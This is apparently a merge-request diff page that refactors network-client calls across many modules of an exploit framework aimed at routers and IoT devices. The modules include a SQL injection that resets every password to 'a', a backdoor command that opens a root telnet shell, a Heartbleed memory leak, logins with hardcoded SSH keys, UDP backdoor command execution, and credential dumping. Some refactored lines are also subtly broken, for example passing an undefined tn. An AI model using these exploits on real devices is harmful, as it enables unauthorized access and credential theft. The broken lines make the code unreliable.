self.tcp_close(tcp_client) tcp_client.close()
return True return True
return False return False
......
...@@ -30,30 +30,32 @@ class Exploit(TelnetClient): ...@@ -30,30 +30,32 @@ class Exploit(TelnetClient):
if self.check(): if self.check():
print_success("Target appears to be vulnerable...") print_success("Target appears to be vulnerable...")
tn = self.telnet_login(self.username, self.password) telnet_client = self.telnet_create()
telnet_client.login(self.username, self.password)
print_status("Triggering backdoor to start telnet server") print_status("Triggering backdoor to start telnet server")
self.telnet_read_until(tn, "> ") telnet_client.read_until("> ")
self.telnet_write(tn, "!#/ port lol\r\n") # Backdoor command triggers telnet server to startup. telnet_client.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup.
self.telnet_read_until(tn, "> ") telnet_client.read_until("> ")
self.telnet_write(tn, "quit\r\n") telnet_client.write("quit\r\n")
self.telnet_close() telnet_client.close()
print_success("SQLI successful, going to telnet into port 20000 " print_success("SQLI successful, going to telnet into port 20000 "
"with username root and no password to get shell") "with username root and no password to get shell")
tn = self.telnet_login("root", "", port=20000) telnet_client = self.telnet_create(port=20000)
if tn: if telnet_client.login():
self.telnet_interactive(tn) telnet_client.interactive()
else: else:
print_error("Exploit failed. Target does not appear vulnerable") print_error("Exploit failed. Target does not appear vulnerable")
@mute @mute
def check(self): def check(self):
tn = self.telnet_connect() telnet_client = self.telnet_create()
telnet_client.connect()
res = self.telnet_read_until(tn, "login:") res = telnet_client.read_until("login:")
if res and "Grandstream" in res: if res and "Grandstream" in res:
return True return True
......
...@@ -27,21 +27,22 @@ class Exploit(TelnetClient): ...@@ -27,21 +27,22 @@ class Exploit(TelnetClient):
if self.check(): if self.check():
print_success("Target appears to be vulnerable...") print_success("Target appears to be vulnerable...")
tn = self.telnet_connect() telnet_client = self.telnet_create()
telnet_client.connect()
self.telnet_read_until(tn, "Username: ")
self.telnet_write(tn, "';update user set password='a';--\r\n") # This changes all the passwords to 'a' telnet_client.read_until(tn, "Username: ")
self.telnet_read_until(tn, "Password: ") telnet_client.write("';update user set password='a';--\r\n") # This changes all the passwords to 'a'
self.telnet_write(tn, "nothing\r\n") telnet_client.read_until("Password: ")
self.telnet_read_until(tn, "Username: ") telnet_client.write("nothing\r\n")
self.telnet_write(tn, "admin\r\n") telnet_client.read_until("Username: ")
self.telnet_read_until(tn, "Password: ") telnet_client.write("admin\r\n")
self.telnet_write(tn, "a\r\n") # Login with the new password telnet_client.read_until("Password: ")
self.telnet_read_until(tn, "> ") telnet_client.write("a\r\n") # Login with the new password
self.telnet_write(tn, "!#/ port lol\r\n") # Backdoor command triggers telnet server to startup. telnet_client.read_until("> ")
self.telnet_read_until(tn, "> ") telnet_client.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup.
self.telnet_write(tn, "quit\r\n") telnet_client.read_until("> ")
self.telnet_close() telnet_client.write("quit\r\n")
telnet_client.close()
print_success("SQLI successful, going to telnet into port 20000 " print_success("SQLI successful, going to telnet into port 20000 "
"with username root and no password to get shell") "with username root and no password to get shell")
...@@ -51,9 +52,10 @@ class Exploit(TelnetClient): ...@@ -51,9 +52,10 @@ class Exploit(TelnetClient):
@mute @mute
def check(self): def check(self):
tn = self.telnet_connect() telnet_client = self.telnet_create()
telnet_client.connect()
res = self.telnet_read_until(tn, "login:") res = telnet_client.read_until("login:")
if res and "Grandstream" in res: if res and "Grandstream" in res:
return True return True
......
...@@ -172,8 +172,8 @@ class Exploit(TCPClient): ...@@ -172,8 +172,8 @@ class Exploit(TCPClient):
print_status("Sending Heartbeat...") print_status("Sending Heartbeat...")
heartbeat_req = self.heartbeat_request(self.heartbeat_length) heartbeat_req = self.heartbeat_request(self.heartbeat_length)
self.tcp_send(self.tcp_client, heartbeat_req) self.tcp_client.send(heartbeat_req)
hdr = self.tcp_recv_all(self.tcp_client, self.SSL_RECORD_HEADER_SIZE) hdr = self.tcp_client.recv_all(self.SSL_RECORD_HEADER_SIZE)
if not hdr: if not hdr:
print_error("No Heartbeat response...") print_error("No Heartbeat response...")
return False return False
...@@ -182,24 +182,25 @@ class Exploit(TCPClient): ...@@ -182,24 +182,25 @@ class Exploit(TCPClient):
if record_type != self.HEARTBEAT_RECORD_TYPE or version != self.TLS_VERSION[self.tls_version]: if record_type != self.HEARTBEAT_RECORD_TYPE or version != self.TLS_VERSION[self.tls_version]:
print_error("Unexpected Hearbeat response header") print_error("Unexpected Hearbeat response header")
self.tcp_close(self.tcp_client) self.tcp_client.close()
heartbeat_data = self.tcp_recv_all(self.tcp_client, self.heartbeat_length) heartbeat_data = self.tcp_client.recv_all(self.heartbeat_length)
if heartbeat_data: if heartbeat_data:
print_success("Heartbeat response, {} bytes".format(len(heartbeat_data))) print_success("Heartbeat response, {} bytes".format(len(heartbeat_data)))
else: else:
print_error("No heartbeat response") print_error("No heartbeat response")
self.tcp_close(self.tcp_client) self.tcp_client.close()
return heartbeat_data return heartbeat_data
def establish_connect(self): def establish_connect(self):
self.tcp_client = self.tcp_connect() self.tcp_client = self.tcp_create()
self.tcp_client.connect()
print_status("Sending Client Hello...") print_status("Sending Client Hello...")
data = self.client_hello() data = self.client_hello()
self.tcp_send(self.tcp_client, data) self.tcp_client.send(data)
server_response = self.get_server_hello() server_response = self.get_server_hello()
if not server_response: if not server_response:
...@@ -303,11 +304,11 @@ class Exploit(TCPClient): ...@@ -303,11 +304,11 @@ class Exploit(TCPClient):
already_read = already_read + single_cert_len + 3 already_read = already_read + single_cert_len + 3
def get_ssl_record(self): def get_ssl_record(self):
hdr = self.tcp_recv_all(self.tcp_client, self.SSL_RECORD_HEADER_SIZE) hdr = self.tcp_client.recv_all(self.SSL_RECORD_HEADER_SIZE)
if hdr: if hdr:
length = unpack(">BHH", hdr)[2] length = unpack(">BHH", hdr)[2]
data = self.tcp_recv_all(self.tcp_client, length) data = self.tcp_client.recv_all(length)
hdr += data hdr += data
return hdr return hdr
......
...@@ -68,10 +68,10 @@ class Exploit(SSHClient): ...@@ -68,10 +68,10 @@ class Exploit(SSHClient):
def run(self): def run(self):
if self.check(): if self.check():
print_success("Target seems to be vulnerable") print_success("Target seems to be vulnerable")
ssh = self.ssh_login_pkey(self.valid["username"], self.valid["priv_key"]) ssh_client = self.ssh_create()
if ssh: if ssh_client.login_pkey(self.valid["username"], self.valid["priv_key"]):
self.ssh_interactive(ssh) ssh_client.interactive()
ssh.close() ssh_client.close()
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
else: else:
...@@ -80,9 +80,9 @@ class Exploit(SSHClient): ...@@ -80,9 +80,9 @@ class Exploit(SSHClient):
@mute @mute
def check(self): def check(self):
for key in self.private_keys: for key in self.private_keys:
ssh = self.ssh_login_pkey(key["username"], key["priv_key"]) ssh_client = self.ssh_create()
if ssh: if ssh_client.login_pkey(key["username"], key["priv_key"]):
ssh.close() ssh_client.close()
self.valid = key self.valid = key
return True # target is vulnerable return True # target is vulnerable
......
...@@ -29,9 +29,9 @@ class Exploit(UDPClient): ...@@ -29,9 +29,9 @@ class Exploit(UDPClient):
def run(self): def run(self):
print_status("Sending payload") print_status("Sending payload")
udp_client = self.udp_create() udp_client = self.udp_create()
self.udp_send(udp_client, self.payload) udp_client.send(self.payload)
response = self.udp_recv(udp_client, 2048) response = udp_client.recv(2048)
if response and len(response): if response and len(response):
if b"UseUserCredential" in response: if b"UseUserCredential" in response:
...@@ -45,9 +45,9 @@ class Exploit(UDPClient): ...@@ -45,9 +45,9 @@ class Exploit(UDPClient):
@mute @mute
def check(self): def check(self):
udp_client = self.udp_create() udp_client = self.udp_create()
self.udp_send(udp_client, self.payload) udp_client.send(self.payload)
response = self.udp_recv(udp_client, 2048) response = udp_client.recv(2048)
if response and len(response) and b"UseUserCredential" in response: if response and len(response) and b"UseUserCredential" in response:
return True # target is vulnerable return True # target is vulnerable
......
...@@ -46,8 +46,8 @@ class Exploit(UDPClient): ...@@ -46,8 +46,8 @@ class Exploit(UDPClient):
) )
udp_client = self.udp_create() udp_client = self.udp_create()
self.udp_send(udp_client, request) udp_client.send(request)
self.udp_close(udp_client) udp_client.close()
return "" return ""
...@@ -64,9 +64,9 @@ class Exploit(UDPClient): ...@@ -64,9 +64,9 @@ class Exploit(UDPClient):
udp_client = self.udp_create() udp_client = self.udp_create()
if udp_client: if udp_client:
self.udp_send(udp_client, request) udp_client.send(request)
response = self.udp_recv(udp_client, 65535) response = udp_client.recv(65535)
self.udp_close(udp_client) udp_client.close()
if response and b"Linux, UPnP/1.0, DIR-" in response: if response and b"Linux, UPnP/1.0, DIR-" in response:
return True # target is vulnerable return True # target is vulnerable
......
...@@ -26,10 +26,10 @@ class Exploit(UDPClient, TelnetClient): ...@@ -26,10 +26,10 @@ class Exploit(UDPClient, TelnetClient):
def run(self): def run(self):
print_status("Sending backdoor packet") print_status("Sending backdoor packet")
if self.check(): if self.check():
telnet_client = self.telnet_connect(port=23) telnet_client = self.telnet_create(port=23)
if telnet_client: if telnet_client.connect():
self.telnet_interactive(telnet_client) telnet_client.interactive()
self.telnet_close(telnet_client) telnet_client.close()
else: else:
print_error("Exploit failed - could not connect to the telnet service") print_error("Exploit failed - could not connect to the telnet service")
else: else:
...@@ -38,9 +38,9 @@ class Exploit(UDPClient, TelnetClient): ...@@ -38,9 +38,9 @@ class Exploit(UDPClient, TelnetClient):
@mute @mute
def check(self): def check(self):
udp_client = self.udp_create() udp_client = self.udp_create()
self.udp_send(udp_client, b"HELODBG") udp_client.send(b"HELODBG")
response = self.udp_recv(udp_client, 1024) response = udp_client.recv(1024)
if response and b"Hello" in response: if response and b"Hello" in response:
return True # target is vulnerable return True # target is vulnerable
......
...@@ -73,9 +73,9 @@ class Exploit(UDPClient): ...@@ -73,9 +73,9 @@ class Exploit(UDPClient):
@mute @mute
def check(self): def check(self):
udp_client = self.udp_create() udp_client = self.udp_create()
self.udp_send(udp_client, self.payload) udp_client.send(self.payload)
response = self.udp_recv(udp_client, 1024) response = udp_client.recv(1024)
self.udp_close(udp_client) udp_client.close()
if response: if response:
self.content = response self.content = response
......
...@@ -34,7 +34,7 @@ class Exploit(SSHClient): ...@@ -34,7 +34,7 @@ class Exploit(SSHClient):
if self.backup_configuration(): if self.backup_configuration():
print_status("Downloading current configuration...") print_status("Downloading current configuration...")
content = self.ssh_get_content(self.ssh_client, "/backup.backup") content = self.ssh_client.get_content("/backup.backup")
backup = self.backup_patch(content) backup = self.backup_patch(content)
if backup: if backup:
...@@ -49,10 +49,10 @@ class Exploit(SSHClient): ...@@ -49,10 +49,10 @@ class Exploit(SSHClient):
@mute @mute
def check(self): def check(self):
self.ssh_client = self.ssh_login(self.username, self.password) self.ssh_client = self.ssh_create()
if self.ssh_client: if self.ssh_client.login(self.username, self.password):
output = self.ssh_execute(self.ssh_client, "/system resource print") output = self.ssh_client.execute("/system resource print")
res = re.findall(b"version: (.+?) ", output) res = re.findall(b"version: (.+?) ", output)
if res: if res:
...@@ -68,11 +68,11 @@ class Exploit(SSHClient): ...@@ -68,11 +68,11 @@ class Exploit(SSHClient):
return False return False
def backup_configuration(self): def backup_configuration(self):
output = self.ssh_execute(self.ssh_client, "/system backup save name=\"backup.backup\" dont-encrypt=yes") output = self.ssh_client.execute("/system backup save name=\"backup.backup\" dont-encrypt=yes")
if b"backup saved" in output: if b"backup saved" in output:
return True return True
else: else:
output = self.ssh_execute(self.ssh_client, "/system backup save name=\"backup.backup\"") output = self.ssh_client.execute("/system backup save name=\"backup.backup\"")
if b"backup saved" in output: if b"backup saved" in output:
return True return True
...@@ -102,13 +102,13 @@ class Exploit(SSHClient): ...@@ -102,13 +102,13 @@ class Exploit(SSHClient):
return backup return backup
def backup_restore(self, backup): def backup_restore(self, backup):
self.ssh_send_content(self.ssh_client, backup, "/backup.backup") self.ssh_client.send_content(backup, "/backup.backup")
output = self.ssh_execute(self.ssh_client, "/system backup load name=\"backup.backup\" password=\"\"") output = self.ssh_client.execute("/system backup load name=\"backup.backup\" password=\"\"")
if b"configuration restored" in output: if b"configuration restored" in output:
return True return True
else: else:
output = self.ssh_execute(self.ssh_client, "/system backup load name=\"backup.backup\"") output = self.ssh_client.execute("/system backup load name=\"backup.backup\"")
if b"configuration restored" in output: if b"configuration restored" in output:
return True return True
......
...@@ -64,23 +64,25 @@ class Exploit(TCPClient): ...@@ -64,23 +64,25 @@ class Exploit(TCPClient):
def get_creds(self): def get_creds(self):
creds = [] creds = []
tcp_client = self.tcp_connect()
self.tcp_send(tcp_client, self.packet_a) tcp_client = self.tcp_create()
data = self.tcp_recv(tcp_client, 1024) tcp_client.connect()
tcp_client.send(self.packet_a)
data = tcp_client.recv(1024)
if not data or len(data) < 39: if not data or len(data) < 39:
return None return None
packet = self.packet_b[:19] + data[38:39] + self.packet_b[20:] packet = self.packet_b[:19] + data[38:39] + self.packet_b[20:]
self.tcp_send(tcp_client, packet) tcp_client.send(packet)
data = self.tcp_recv(tcp_client, 1024) data = tcp_client.recv(1024)
if not data: if not data:
return None return None
self.tcp_close(tcp_client) tcp_client.close()
creds = self.get_pair(data) creds = self.get_pair(data)
if not creds: if not creds:
......
...@@ -79,16 +79,16 @@ class Exploit(TCPClient): ...@@ -79,16 +79,16 @@ class Exploit(TCPClient):
headers = struct.pack(self.endianness + "III", 0x53634D4D, 0x01, 0x01) headers = struct.pack(self.endianness + "III", 0x53634D4D, 0x01, 0x01)
payload = headers + b"\x00" payload = headers + b"\x00"
tcp_client = self.tcp_connect() tcp_client = self.tcp_create()
if tcp_client: if tcp_client.connect():
self.tcp_send(tcp_client, payload) tcp_client.send(payload)
response = self.tcp_recv(tcp_client, 0xC) response = tcp_client.recv(0xC)
if response: if response:
sig, ret_val, ret_len = struct.unpack(self.endianness + "III", response) sig, ret_val, ret_len = struct.unpack(self.endianness + "III", response)
response = self.tcp_recv(tcp_client, ret_len) response = tcp_client.recv(tcp_client, ret_len)
self.tcp_close(tcp_client) tcp_client.close()
if response: if response:
return str(response, "utf-8") return str(response, "utf-8")
...@@ -97,12 +97,11 @@ class Exploit(TCPClient): ...@@ -97,12 +97,11 @@ class Exploit(TCPClient):
@mute @mute
def check(self): def check(self):
tcp_client = self.tcp_connect() tcp_client = self.tcp_create()
if tcp_client.connect():
if tcp_client: tcp_client.send(b"ABCDE")
self.tcp_send(tcp_client, b"ABCDE") response = tcp_client.recv(5)
response = self.tcp_recv(tcp_client, 5) tcp_client.close()
self.tcp_close(tcp_client)
if response: if response:
if response.startswith(b"MMcS"): if response.startswith(b"MMcS"):
......
...@@ -65,15 +65,15 @@ class Exploit(TCPClient): ...@@ -65,15 +65,15 @@ class Exploit(TCPClient):
header = struct.pack(self.endianness + "III", 0x53634D4D, 0x07, len(cmd) + 1) header = struct.pack(self.endianness + "III", 0x53634D4D, 0x07, len(cmd) + 1)
payload = header + cmd + b"\x00" payload = header + cmd + b"\x00"
tcp_client = self.tcp_connect() tcp_client = self.tcp_create()
if tcp_client: if tcp_client.connect():
self.tcp_send(tcp_client, payload) tcp_client.tcp_send(payload)
response = self.tcp_recv(tcp_client, 0xC) response = tcp_client.recv(0xC)
sig, ret_val, ret_len = struct.unpack(self.endianness + "III", response) sig, ret_val, ret_len = struct.unpack(self.endianness + "III", response)
response = self.tcp_recv(tcp_client, ret_len) response = tcp_client.recv(ret_len)
self.tcp_close(tcp_client) tcp_client.tcp_close()
if response: if response:
return str(response, "utf-8") return str(response, "utf-8")
...@@ -82,12 +82,12 @@ class Exploit(TCPClient): ...@@ -82,12 +82,12 @@ class Exploit(TCPClient):
@mute @mute
def check(self): def check(self):
tcp_client = self.tcp_connect() tcp_client = self.tcp_create()
if tcp_client: if tcp_client.connect():
self.tcp_send(tcp_client, b"ABCDE") tcp_client.send(b"ABCDE")
response = self.tcp_recv(tcp_client, 5) response = tcp_client.recv(5)
self.tcp_close(tcp_client) tcp_client.close()
if response: if response:
if response.startswith(b"MMcS"): if response.startswith(b"MMcS"):
......
...@@ -37,9 +37,9 @@ class Exploit(UDPClient): ...@@ -37,9 +37,9 @@ class Exploit(UDPClient):
payload = b"AA\x00\x00AAAA" + cmd + b"\x00" payload = b"AA\x00\x00AAAA" + cmd + b"\x00"
udp_client = self.udp_create() udp_client = self.udp_create()
self.udp_send(udp_client, payload) udp_client.send(payload)
response = self.udp_recv(udp_client, 1024) response = udp_client.recv(udp_client, 1024)
self.udp_close(udp_client) udp_client.udp_close()
if response: if response:
return str(response[8:], "utf-8") return str(response[8:], "utf-8")
...@@ -52,9 +52,9 @@ class Exploit(UDPClient): ...@@ -52,9 +52,9 @@ class Exploit(UDPClient):
payload = b"\x00" * 8 payload = b"\x00" * 8
udp_client = self.udp_create() udp_client = self.udp_create()
self.udp_send(udp_client, payload) udp_client.send(payload)
if udp_client: if udp_client:
response = self.udp_recv(udp_client, 1024) response = udp_client.recv(1024)
if response: if response:
if response.endswith(b"\xD0\xA5Login:"): if response.endswith(b"\xD0\xA5Login:"):
......
...@@ -60,8 +60,8 @@ class Exploit(FTPClient): ...@@ -60,8 +60,8 @@ class Exploit(FTPClient):
print_status("Trying FTP authentication with Username: {} and Password: {}".format(self.username, print_status("Trying FTP authentication with Username: {} and Password: {}".format(self.username,
self.password)) self.password))
ftp_client = self.ftp_login(self.username, self.password) ftp_client = self.ftp_create()
if ftp_client: if ftp_client.login(self.username, self.password):
print_success("Authentication successful") print_success("Authentication successful")
content = self.ftp_get_content(ftp_client, "user.ini") content = self.ftp_get_content(ftp_client, "user.ini")
creds = re.findall(r"add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n", str(content, "utf-8")) creds = re.findall(r"add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n", str(content, "utf-8"))
......
...@@ -48,7 +48,8 @@ class Exploit(SNMPClient): ...@@ -48,7 +48,8 @@ class Exploit(SNMPClient):
print_status("Reading parameters...") print_status("Reading parameters...")
for name in self.oids.keys(): for name in self.oids.keys():
snmp = self.snmp_get("private", self.oids[name]) snmp_client = self.snmp_create()
snmp = snmp_client.get("private", self.oids[name])
if snmp: if snmp:
value = str(snmp[0][1]) value = str(snmp[0][1])
...@@ -63,7 +64,8 @@ class Exploit(SNMPClient): ...@@ -63,7 +64,8 @@ class Exploit(SNMPClient):
@mute @mute
def check(self): def check(self):
snmp = self.snmp_get("private", "1.3.6.1.2.1.1.1.0") snmp_client = self.snmp_create()
snmp = snmp_client.get("private", "1.3.6.1.2.1.1.1.0")
if snmp: if snmp:
return True # target is not vulnerable return True # target is not vulnerable
......
...@@ -31,9 +31,9 @@ class Exploit(UDPClient): ...@@ -31,9 +31,9 @@ class Exploit(UDPClient):
request = bytes(request, "utf-8") request = bytes(request, "utf-8")
udp_client = self.udp_create() udp_client = self.udp_create()
self.udp_send(udp_client, request) udp_client.send(request)
response = self.udp_recv(udp_client, 1024) response = udp_client.recv(1024)
if response: if response:
response = str(response, "utf-8") response = str(response, "utf-8")
...@@ -55,4 +55,4 @@ class Exploit(UDPClient): ...@@ -55,4 +55,4 @@ class Exploit(UDPClient):
else: else:
print_error("Target did not respond to M-SEARCH request") print_error("Target did not respond to M-SEARCH request")
self.udp_close(udp_client) udp_client.close()
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment